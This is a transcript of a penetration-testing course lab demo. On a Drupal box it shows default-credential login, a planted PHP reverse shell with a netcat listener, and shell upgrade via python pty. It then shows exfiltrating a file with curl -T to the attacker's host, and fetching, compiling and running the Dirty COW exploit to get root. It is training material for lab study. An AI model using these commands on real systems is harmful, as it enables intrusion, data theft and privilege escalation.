Transferring Files Demo


Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:01
Welcome to the file transfer lab demo. You can see I'm in a Drupal site here. You can tell that because it's just "Powered by Drupal" and also because of the little Drupal logo here. So sometimes it's as easy as guessing. So I'm going to do admin admin
00:17
and you can see I logged in as admin. Hello admin.
00:22
So what I want to do now, this is just getting to know content management systems. What I want to do with content is I want to add content
00:29
a basic page.
00:31
I'm going to call this shell.php
00:35
and I'm going to change this to PHP code
00:39
now. I need to figure out what shell I want to use. Well, obviously we know it's PHP. You can see this is that site I was telling you about, revshells.com.
00:48
I've already picked the pentestmonkey shell. I like this shell.
00:52
And what you do is, I've just added my IP address and the port number.
00:56
It actually tells you what to do in your box here for the listener.
00:59
And I've changed my shell from the default /bin/sh to /bin/bash because I like bash shells better.
01:06
I'm gonna copy this. I'm going to paste it here.
01:08
Yeah.
01:10
So what I need to get ready is I need to get a listener ready.
01:14
Netcat,
00:59
nc -nlvp 4444.
01:19
And we'll save this
01:23
and
01:26
we see if I hit preview.
01:30
Now I have my shell here. www-data. You can see this is "no job control in this shell." So let's try to su root.
01:40
It says "must be run from a terminal." So now we know we have what I call a bad shell.
01:46
How do we make this a nicer shell?
01:49
So I told you about python -c, import pty.
01:53
Let's do that.
01:56
But you can see this has /bin/sh.
01:57
I like bash better, but I'll show you what happens if you do /bin/sh.
02:01
So you just get the little dollar sign and not the nicer output.
02:06
You can of course change this
02:07
to /bin/bash
02:13
and there you go. Now if I wanted to su root,
02:16
now it asks me for the password; obviously I don't know the root user's password.
02:21
Not yet.
02:23
So typically I'll go and figure out
02:27
who
02:30
is in here. And I see this drupalpro. Which users are in here, I should say. Remember, cat /etc/passwd.
02:40
And I see drupalpro.
02:43
So I'll change directory to drupalpro.
02:47
And then I'll see what files are in here. And I see something called secret.
02:52
Let's say I want to get that file onto my Kali box.
02:57
what I'll do is I'll split my terminal vertically.
03:00
Mhm.
03:04
And I'm gonna use that SimpleHTTPPutServer. I told you I'd show you what it looks like: cat it.
03:13
It's a very small script, but I can now put things onto my Kali box. Whereas if I just did SimpleHTTPServer, or http.server with python three, I can't put things onto my machine.
03:28
So let's do
03:30
python, python two.
03:34
And it's on port 8000.
03:36
So what I'll do on this side is curl -T, big T, secret, and then my Kali box, 192.168.1.228:8000.
03:53
And you can see that I got a PUT request here.
03:58
And if I check my desktop
04:01
we can X out of here. Now
04:04
I see that I get secret
04:06
here.
04:09
So I put that from the Drupal machine onto my machine with that server.
04:17
Now what I can do
04:21
is I can try to put a file from Kali onto this machine, and if I do uname -a, I see a kernel version, and we'll talk about this more in kernel exploits,
04:34
but I know that this is vulnerable to Dirty COW,
04:38
as you can see I already have Dirty COW down here.
04:42
So typically what I do is go to the /tmp directory, because I know it's globally readable, writable and executable,
04:48
and I'll use curl http://192.168.1.228:8000.
04:58
Remember, this is on the desktop and Dirty COW's on the desktop: dirtycow.c, output dirty, you can name it whatever you want, dirty.c,
05:12
and now I see two GET requests on the right,
05:15
and I see that that was downloaded.
05:18
So if I open this, as I said, I like to look at the comments.
05:24
It should tell me how to compile it. So I see here gcc -pthread dirty.c -o dirty.
05:32
So I'll try that here
05:42
and chmod +x
05:46
dirty,
05:49
and then I will
05:53
and a new password,
05:57
and you can see it should have overwritten
06:00
the /etc/passwd file to have this firefart user
06:05
in it as the root user.
06:15
So sometimes you'll notice that you may not get an output with these kernel exploits. There we go. Now we see something.
06:23
Yeah.
06:25
Great. So now we see that it's done: check /etc/passwd to see if the new user was created.
06:30
So now I can do su firefart
06:41
and my password of fire.
06:44
And now we see I am the root user.
06:47
So that gives you some idea of how I get files. I mean, I showed you many examples; this was just one, setting up that SimpleHTTPPutServer. But you saw how I could put files onto my machine.
07:01
You saw how I transferred from a bad shell where I couldn't use su
07:09
to using python and importing pty,
07:13
And then curling and getting the exploit onto the victim machine and ultimately being able to execute it and becoming the root user, which we'll talk about a lot more in the next module for privilege escalation. So I will see you for that.